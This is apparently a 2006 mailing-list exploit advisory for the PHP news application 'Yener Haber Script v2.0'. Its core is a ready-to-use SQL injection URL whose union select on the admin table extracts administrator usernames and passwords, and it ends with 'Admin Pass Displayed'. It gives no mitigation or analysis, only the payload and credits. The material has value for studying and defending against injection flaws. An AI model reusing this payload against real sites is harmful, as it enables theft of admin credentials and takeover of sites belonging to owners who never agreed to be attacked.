Yener Haber Script v2.0 SQL injection
Date: 4 Oct 2006 10:16:25 -0000
From: [email protected]
To: [email protected]
Subject: Yener Haber Script v2.0 SQL injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
# BiyoSecurity.Org
# script name : Yener Haber Script v2.0
# Demo : http://www50.brinkster.com/yenerturk
# Risk : High
# Regards : Dj_ReMix
# Thanks : Korsan , Liz0zim , TR_IP
# Exploit :
http://victim.com/?x=2&kategori=11&id=-1%20union+select+id,kullanici_adi,sifre,4,5,6,7,8,9+from+admin
Admin Pass Displayed :=)
